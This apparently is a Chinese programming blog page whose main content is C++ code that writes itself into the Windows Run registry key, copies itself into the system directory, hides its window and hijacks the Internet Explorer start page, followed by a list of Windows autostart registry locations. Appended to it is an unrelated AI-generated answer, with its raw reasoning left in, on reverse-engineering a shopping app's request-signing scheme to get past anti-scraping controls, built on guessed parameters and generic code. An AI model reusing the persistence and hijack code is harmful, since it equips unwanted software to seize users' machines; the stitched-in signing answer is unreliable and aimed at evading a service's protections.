通过注册表修改IE主页、自复制和开机启动

本文介绍了一种使用C++编程语言实现程序自启动的方法,包括如何修改注册表以达到程序随系统启动自动运行的目的,并提供了具体的代码示例。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

// AutoRun.cpp : Defines the entry point for the console application.
//

#include "stdafx.h"
#include <Windows.h>
#include <stdio.h>

#pragma comment( linker, "/subsystem:windows /entry:mainCRTStartup" )

//用于修改字符串类型键值
void CreateStringReg(::HKEY hRoot, char* szSubKey, char* valueName, char* data) {
	HKEY hKey;
	//打开注册表键,不存在则创建它
	long lRet = RegCreateKeyEx(hRoot, szSubKey, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &hKey, NULL);
	if(lRet != ERROR_SUCCESS) {
		printf("error no RegCreateKeyEx %s\n", szSubKey);
		return;
	}

	//修改注册表简直,没有则创建它
	lRet = RegSetValueEx(hKey, valueName, 0, REG_SZ, (BYTE*)data, strlen(data));
	if(lRet != ERROR_SUCCESS) {
		printf("error no RegSetValueEx %s\n", valueName);
		return;
	}

	RegCloseKey(hKey);
}

//用于修改数字类型键值
void CreateDWORDReg(HKEY hRoot, char* szSubKey, char* valueName, DWORD data) {
	HKEY hKey;
	//打开注册表键,没有则创建它
	long lRet = RegCreateKeyEx(hRoot, szSubKey, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &hKey, NULL);
	if(lRet != ERROR_SUCCESS) {
		printf("error no RegCreateKeyEx %s \n", szSubKey);
		return;
	}
	DWORD dwSize = sizeof(DWORD);
	//修改注册表键值,没有则创建他
	lRet = RegSetValueEx(hKey, valueName, 0, REG_DWORD, (BYTE*)&data, dwSize);
	if(lRet != ERROR_SUCCESS) {
		printf("error no RegSetValueEx %s \n", valueName);
		return;
	}

	RegCloseKey(hKey);
}


//修改IE首页
void modifyIEStartPage() {
	//要修改成的网址
	char startPage[255] = "http://pengranxiang.iteye.com/";
	//调用修改字符串类型键值的函数
	CreateStringReg(HKEY_CURRENT_USER, "Software\\Microsoft\\Internet Explorer\\Main", "Start Page", startPage);
}

//程序自复制 到系统目录
void copyItself() {
	char modulePath[256];
	char sysPath[256];
	//取得程序名字
	GetModuleFileName(NULL, modulePath, 256);
	//取得系统根目录
	GetSystemDirectory(sysPath, 256);

	int ret = CopyFile(modulePath, strcat(sysPath, "\\AutoRun.exe"), TRUE);
	if(ret) {
		printf("%s has been copyed to sys dir %s \n", modulePath, sysPath);
	} else {
		printf("copy file error\n");
	}
}


int main(int argc, char* argv[])
{
	char regName[] = "Software\\Microsoft\\Windows\\CurrentVersion\\Run";
	char keyName[] = "AutoRun";
	char keyValue[] = "%systemroot%\\AutoRun.exe";
	//如果%systemroot%下有AutoRun.exe这个文件,那么系统启动时就自行运行
	CreateStringReg(HKEY_LOCAL_MACHINE, regName, keyName, keyValue);
	//复制自己到%systemroot%下面,名字AutoRun.exe
	copyItself();
	return 0;
}

 

系统自启动位置:两个文件夹和八个注册表位置

一、当前用户专有的启动文件夹

  这是许多应用软件自动启动的常用位置,Windows自动启动放入该文件夹的所有快捷方式。用户启动文件夹一般在:\Documents and Settings\<用户名字>\“开始”菜单\程序\启动,其中“<用户名字>”是当前登录的用户帐户名称。

 

二、对所有用户有效的启动文件夹

  这是寻找自动启动程序的第二个重要位置,不管用户用什么身份登录系统,放入该文件夹的快捷方式总是自动启动——这是它与用户专有的启动文件夹的区别所 在。该文件夹一般在:\Documents and Settings\All Users\“开始”菜单\程序\启动。

 

三、Load注册键

  介绍该注册键的资料不多,实际上它也能够自动启动程序。位置:HKEY_CURRENT_USER\Software\Microsoft\WindowsNT\CurrentVersion\Windows\load。

 

四、Userinit注册键


位置:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon\Userinit。 这里也能够使系统启动时自动初始化程序。通常该注册键下面有一个userinit.exe,如图一,但这个键允许指定用逗号分隔的多个程序,例如 “userinit.exe,OSA.exe”(不含引号)。

 

五、Explorer\Run注册键

  和load、Userinit不同,Explorer\Run键在HKEY_CURRENT_USER和HKEY_LOCAL_MACHINE下都 有,具体位置 是:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run,

和 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run。

 

六、RunServicesOnce注册键

  RunServicesOnce注册键用来启动服务程序,启动时间在用户登录之前,而且先于其他通过注册键启动的程序。 RunServicesOnce注册键的位置 是:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce, 和 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServicesOnce。

 

七、RunServices注册键

  RunServices注册键指定的程序紧接RunServicesOnce指定的程序之后运行,但两者都在用户登录之前。RunServices的 位置 是:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices, 和 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices。

 

八、RunOnce\Setup注册键

  RunOnce\Setup指定了用户登录之后运行的程序,它的位置 是:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\Setup, 和 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Setup。

 

九、RunOnce注册键

  安装程序通常用RunOnce键自动运行程序,它的位置在 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce

和 HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce。

 

HKEY_LOCAL_MACHINE下面的RunOnce键会在用户登录之后立即运行程序,运行时机在其他Run键指定的程序之前。 HKEY_CURRENT_USER下面的RunOnce键在操作系统处理其他Run键以及“启动”文件夹的内容之后运行。

如果是XP,你还需要检查一下 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx。

 

十、Run注册键

  Run是自动运行程序最常用的注册键,位置 在:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run,

和 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run。 HKEY_CURRENT_USER下面的Run键紧接HKEY_LOCAL_MACHINE下面的Run键运行,但两者都在处理“启动”文件夹之前。

 

 

<think>好的,我现在需要帮助用户了解或实现得物签名的相关技术,特别是签名算法的实现方式。首先,我需要收集已有的信息。根据用户提供的引用,特别是引用[4]和[5],得物的签名算法可能涉及逆向工程分析,使用了JavaScript中的XMLHttpRequest重写来拦截请求,并在请求中包含特定的sign参数。这可能意味着签名生成是在客户端进行的,通常在前端JavaScript代码中完成。 接下来,我应该考虑常见的签名生成方法。常见的Web应用签名算法通常使用HMAC、AES、RSA或自定义的哈希组合。引用[1]提到了RSA算法,但得物的签名可能更倾向于使用HMAC-SHA256之类的哈希算法,结合时间戳、随机数和请求参数进行签名,以防止篡改和重放攻击。 用户可能需要具体的步骤,比如逆向分析得物的JavaScript代码,找到生成sign的函数,提取关键参数和加密逻辑。引用[5]中的代码片段展示了如何重写XMLHttpRequest的open方法来拦截请求,这可能用于调试和定位签名生成的代码位置。 此外,引用[4]提到使用Python进行算法还原,所以可能需要在Python中复现JavaScript的签名生成逻辑。这通常涉及分析请求参数如何排序、拼接,以及如何与密钥结合进行哈希或加密。需要注意反爬机制,如obfuscation(代码混淆)或动态密钥,这可能需要使用AST(抽象语法树)解析或动态执行来还原算法。 用户可能还需要了解如何应对反调试措施,比如在Chrome开发者工具中使用断点调试,或者使用工具如Frida进行Hook。同时,引用[3]和[4]强调了法律和合规问题,确保研究仅用于学习目的,不用于非法用途。 最后,应该提醒用户注意法律风险,遵循网站的使用条款,避免侵犯知识产权或违反计算机安全法律。总结起来,实现得物签名需要逆向工程分析前端代码,提取关键算法,处理可能的混淆和反调试,最后用目标语言如Python复现算法。</think>### 得物签名算法实现方式分析 得物签名算法主要用于接口请求的身份验证和防篡改保护,常见实现方式涉及以下技术点: #### 1. **签名参数组成** 签名通常由以下参数动态生成: - 请求参数(经排序、过滤空值后拼接) - 时间戳(如:$timestamp=1620000000$) - 随机数(如:$nonce=5a8s3d$) - 设备指纹(如:$device\_id=abcdef$) - 应用密钥(加密盐值,可能动态获取)[^4] 示例参数拼接逻辑: $$ \text{sign\_str} = \text{path} + \text{sorted\_params} + \text{timestamp} + \text{nonce} $$ #### 2. **加密算法类型** 根据逆向分析,得物可能采用以下组合: - **HMAC-SHA256**:对拼接字符串进行哈希运算 - **AES/Base64编码**:对结果二次处理 - **自定义位移/异或操作**:增加逆向难度[^5] #### 3. **JavaScript代码混淆** 关键函数可能被混淆,例如: ```javascript function _0x12ab5(a, b) { return a ^ b << 3; } // 需要AST解析还原控制流 ``` #### 4. **Python算法还原示例** ```python import hmac import hashlib def generate_sign(params, secret_key): # 1. 参数排序并拼接 sorted_str = '&'.join([f"{k}={v}" for k,v in sorted(params.items())]) # 2. HMAC-SHA256加密 sign = hmac.new(secret_key.encode(), sorted_str.encode(), hashlib.sha256).hexdigest() # 3. 自定义处理(示例) return sign.upper() + str(int(time.time())) ``` #### 5. **反爬对抗措施** - 动态密钥:通过接口定期更新加密盐值 - 环境检测:验证是否在真机环境运行 - 请求频率限制:异常高频触发验证码[^5]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值